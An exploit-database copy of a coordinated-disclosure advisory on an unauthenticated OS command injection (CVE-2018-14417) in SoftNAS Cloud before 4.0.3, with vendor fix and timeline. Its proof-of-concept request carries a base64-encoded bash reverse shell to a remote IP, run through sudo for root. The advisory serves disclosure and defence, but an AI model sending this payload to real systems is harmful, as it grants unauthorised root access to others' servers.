Search for hundreds of thousands of exploits

"SoftNAS Cloud < 4.0.3 - OS Command Injection"

Author

Exploit author

"Core Security"

Platform

Exploit platform

php

Release date

Exploit published date

2018-07-27

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

SoftNAS Cloud OS Command Injection

1. *Advisory Information*

Title: SoftNAS Cloud OS Command Injection
Advisory ID: CORE-2018-0009
Advisory URL:
http://www.coresecurity.com/advisories/softnas-cloud-OS-command-injection
Date published: 2018-07-26
Date of last update: 2018-05-28
Vendors contacted: SoftNAS
Release mode: Coordinated release

2. *Vulnerability Information*

Class:  Improper Neutralization of Special Elements used in an OS
Command [CWE-78]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2018-14417

3. *Vulnerability Description*

SoftNAS' website states that:

[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual
storage appliance that runs within public, private or hybrid clouds.
SoftNAS Cloud provides enterprise-grade NAS capabilities, including
encryption, snapshots, rapid rollbacks, and cross-zone high-availability
with automatic failover.

A command injection vulnerability was found in the web administration
console. In particular, snserv script did not sanitize some input
parameters before executing a system command.

4. *Vulnerable Packages*

. SoftNAS Cloud versions prior to 4.0.3
Other products and versions might be affected, but they were not tested.


5. *Vendor Information, Solutions and Workarounds*

SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported
vulnerability. The software update can be performed via the
StorageCenter admin UI in the product.
For more information on the updating process see:
https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.

In addition, SoftNAS published the following release note:
https://docs.softnas.com/display/SD/Release+Notes

6. *Credits*

The vulnerability was discovered and researched by Fernando Diaz and
Fernando Catoira from Core Security Consulting Services. The publication
of this advisory was coordinated by Leandro Cuozzo from Core Advisories
Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Check and execute update functionality abuse leading to command
execution*
[CVE-2018-14417]
The 'recentVersion' parameter from the snserv endpoint is vulnerable to
OS Command Injection when check and execute update operations are
performed.
This endpoint has no authentication/session verification. Therefore, it
is possible for an unauthenticated attacker to execute malicious code in
the target server. As the WebServer runs a Sudoer user (apache), the
malicious code can be executed with root permissions.

The following part of the /etc/sudoers file shows the apache user
capabilities.

/-----
User_Alias      APACHE = apache
# Once SoftNAS UI is operational, only allow the specific command that
require sudo access!!
Cmnd_Alias      SOFTNAS = ALL
APACHE  ALL = (ALL) NOPASSWD: SOFTNAS
-----/

The following proof of concept generates a remote shell on the target
system as root:

/-----
GET
/softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
HTTP/1.1
Host: 10.2.45.208
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.2.45.208/softnas/applets/update/
X-Requested-With: XMLHttpRequest
Connection: close
-----/

As can be seen in the former request the payload had to be base64
encoded as some special characters were not being properly decoded.

8. *Report Timeline*
2018-05-29: Core Security sent an initial notification to SoftNAS,
including a draft advisory.
2018-05-31: SoftNAS confirmed the reported vulnerability and informed
they were working on a plan to fix the issue.
2018-05-31: Core Security thanked the SoftNAS' reply.
2018-06-15: Core Security requested a status update.
2018-06-26: SoftNAS answered saying the fixed version was scheduled for
late July.
2018-06-26: Core Security thanked the update.
2018-07-16: Core Security asked for a status update and requested a
solidified release date.
2018-07-16: SoftNAS informed that the new release version were under QA
verification and they would have the release date during the week.
2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3
version was already available.
2018-07-19: Core Security thanked SoftNAS's update and set July 26th as
the publication date.
2018-07-26: Advisory CORE-2018-0009 published.

9. *References*

[1] https://www.softnas.com

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with
anticipating the future needs and requirements for information security
technologies. We conduct our research in several important areas of
computer security including system vulnerabilities, cyber attack
planning and simulation, source code auditing, and cryptography. Our
results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The
company's threat-aware, identity & access, network security, and
vulnerability management solutions provide actionable insight and
context needed to manage security risks across the enterprise. This
shared insight gives customers a comprehensive view of their security
posture to make better security remediation decisions. Better insight
allows organizations to prioritize their efforts to protect critical
assets, take action sooner to mitigate access risk, and react faster if
a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or info@coresecurity.com

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Release DateTitleTypePlatformAuthor
2018-10-05"D-Link Central WiFiManager Software Controller 1.03 - Multiple Vulnerabilities"webappsphp"Core Security"
2018-07-27"SoftNAS Cloud < 4.0.3 - OS Command Injection"webappsphp"Core Security"
2018-07-13"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities"webappshardware"Core Security"
2018-02-22"Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities"webappsjsp"Core Security"
2018-02-14"Dell EMC Isilon OneFS - Multiple Vulnerabilities"webappslinux"Core Security"
2017-06-28"Kaspersky Anti-Virus File Server 8.0.3.297 - Multiple Vulnerabilities"webappslinux"Core Security"
2017-05-10"SAP SAPCAR 721.510 - Heap Buffer Overflow"doslinux"Core Security"
2016-11-22"TP-LINK TDDP - Multiple Vulnerabilities"doshardware"Core Security"
2016-08-10"SAP SAPCAR - Multiple Vulnerabilities"doslinux"Core Security"
2016-03-16"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow"dosfreebsd_x86-64"Core Security"
2015-12-09"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)"remotewindows"Core Security"
2015-07-08"AirLive (Multiple Products) - OS Command Injection"webappshardware"Core Security"
2015-07-08"AirLink101 SkyIPCam1620W - OS Command Injection"webappshardware"Core Security"
2015-05-26"Sendio ESP - Information Disclosure"webappsjsp"Core Security"
2015-03-18"Fortinet Single Sign On - Stack Overflow"doswindows"Core Security"
2015-01-29"FreeBSD - Multiple Vulnerabilities"dosfreebsd"Core Security"
2015-01-26"Android WiFi-Direct - Denial of Service"dosandroid"Core Security"
2014-11-24"Advantech EKI-6340 - Command Injection"webappscgi"Core Security"
2014-10-17"SAP NetWeaver Enqueue Server - Denial of Service"doswindows"Core Security"
2014-04-17"SAP Router - Timing Attack Password Disclosure"remotehardware"Core Security"
2014-03-12"Oracle VM VirtualBox - 3D Acceleration Multiple Vulnerabilities"dosmultiple"Core Security"
2014-02-06"Publish-It 3.6d - Buffer Overflow"doswindows"Core Security"
2013-12-17"Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)"doswindows"Core Security"
2013-12-11"IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC)"doswindows"Core Security"
2013-11-08"Vivotek IP Cameras - RTSP Authentication Bypass"webappshardware"Core Security"
2013-10-02"PinApp Mail-SeCure 3.70 - Access Control Failure"locallinux"Core Security"
2013-09-09"Sophos Web Protection Appliance - Multiple Vulnerabilities"webappslinux"Core Security"
2013-08-29"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities"doshardware"Core Security"
2013-08-07"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities"webappshardware"Core Security"
2013-08-02"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities"webappshardware"Core Security"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45097/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.